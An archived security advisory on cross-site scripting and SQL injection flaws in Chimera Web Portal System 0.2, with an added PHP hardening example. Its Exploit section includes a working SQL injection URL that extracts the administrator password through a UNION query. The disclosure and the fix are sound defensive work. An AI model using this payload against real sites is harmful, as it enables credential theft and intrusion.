EV0007.txt

2006-01-04T00:00:00
ID PACKETSTORM:42769
Type packetstorm
Reporter Aliaksandr Hartsuyeu
Modified 2006-01-04T00:00:00

Description

                                        
                                            `New eVuln Advisory:  
Chimera Web Portal System Multiple Vulnerabilities  
  
--------------------Summary----------------  
Vendor: Phanatic Softwares (http://www.psoftwares.f2s.com/)  
Software: Chimera Web Portal System (http://sourceforge.net/projects/chimera/)  
Versions: 0.2  
Critical Level: Moderate  
Type: Multiple Vulnerabilities  
Class: Remote  
Status: Unpatched  
Exploit: Available  
Solution: Not Available  
Discovered by: Aliaksandr Hartsuyeu (alex@evuln.com)  
Published: 2006.01.01  
eVuln ID: EV0007  
  
-----------------Description--------------  
XSS  
Vulnerable script:  
modules.php  
  
The variables comment_poster, comment_poster_email, comment_poster_homepage and comment_text aren't sanitized. Users can post messages containing any script code.  
  
  
SQL Injection  
Vulnerable script:  
linkcategory.php  
  
The variable $id isn't properly sanitized before being used in a SQL query. An attacker can inject arbitrary SQL code through it and so run any SQL query.  
  
Condition: magic_quotes_gpc = off  
  
  
--------------Exploit---------------------  
XSS  
guestbook:  
http://host/chimera/modules.php?name=guestbook&file=index  
comment_poster=XSS  
comment_poster_email=XSS  
comment_poster_homepage=XSS  
comment_text=XSS  
  
SQL Injection  
admin password:  
http://host/chimera/linkcategory.php?id=9999'%20union%20select%20admin_password%20from%20admin/*  
  
  
--------------Solution---------------------  
No Patch available.  
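
With no vendor patch, the sketch below shows how an operator could harden the two code paths described above: integer validation plus a bound parameter for the id value, and output encoding for the four guestbook fields. It is an added example, not code from Chimera or from the original advisory. All function names and the links/category_id/title/url schema are hypothetical, and it assumes PHP 7.4+ with PDO.

```php
<?php
// Added illustration: hardened handling of the inputs named in the advisory.
// Function, table and column names are hypothetical, not Chimera's own.

// Accept only a positive decimal integer for the link category id.
function parse_category_id($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Bound parameter: the value never becomes SQL text, so safety no longer depends on magic_quotes_gpc.
function fetch_links(PDO $db, int $categoryId): array
{
    $stmt = $db->prepare('SELECT title, url FROM links WHERE category_id = :id');
    $stmt->bindValue(':id', $categoryId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Encode a value for an HTML text node or a quoted attribute.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Emit the homepage as a link only when it is a plain http(s) URL.
function safe_homepage(string $raw): ?string
{
    $url = filter_var(trim($raw), FILTER_VALIDATE_URL);
    if ($url === false) return null;
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true) ? $url : null;
}

// Render one guestbook entry; non-string fields (e.g. arrays) become ''.
function render_comment(array $post): string
{
    $f = fn(string $k): string => is_string($post[$k] ?? null) ? $post[$k] : '';
    $name = h($f('comment_poster'));
    $mail = h($f('comment_poster_email'));
    $text = nl2br(h($f('comment_text')));
    $home = safe_homepage($f('comment_poster_homepage'));
    $link = $home === null ? '' : ' <a rel="nofollow" href="' . h($home) . '">homepage</a>';
    return "<div class=\"comment\"><b>$name</b> ($mail)$link<p>$text</p></div>";
}
```

A request whose id fails parse_category_id() should be rejected before any query runs. Encoding is applied at output time, so entries already stored in the guestbook are covered as well.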
  
--------------Credit---------------------  
Original Advisory:  
http://evuln.com/vulns/7/summary.html  
  
Discovered by: Aliaksandr Hartsuyeu (alex@evuln.com)  
`